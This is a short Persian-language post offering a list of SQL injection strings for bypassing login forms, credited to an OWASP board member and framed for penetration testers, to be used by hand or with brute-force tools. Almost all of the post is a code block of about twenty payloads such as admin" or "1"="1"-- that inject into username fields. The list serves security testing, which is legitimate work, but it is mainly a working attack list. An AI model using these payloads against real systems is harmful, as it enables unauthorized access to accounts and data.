این تستر برای آزمایش بای پس تأیید ورود با تزریق SQL توسط هکر میباشد. تستر نفوذ می تواند از آن به صورت دستی یا از ابزار بروت فورس استفاده کند تا فرآیند خودکار شود. سازنده این لیست دکتر Emin Islam TatlıIf (عضو هیئت مدیره OWASP) است. اگر پیشنهاد دیگری دارید ، لطفاً در جهت بهبود و گسترش لیست ، نظر خود را ارائه دهید.
به دلیل محدودیت ارسال برخی کارکتر ها بهتر است لیست کامل را از پیوست دریافت کنید .
کد:
admin" -- admin" # admin"/* admin" or "1"="1 admin" or "1"="1"-- admin" or "1"="1"# admin" or "1"="1"/* admin"or 1=1 or ""=" admin" or 1=1 admin" or 1=1-- admin" or 1=1# admin" or 1=1/* admin") or ("1"="1 admin") or ("1"="1"-- admin") or ("1"="1"# admin") or ("1"="1"/* admin") or "1"="1 admin") or "1"="1"-- admin") or "1"="1"# admin") or "1"="1"/*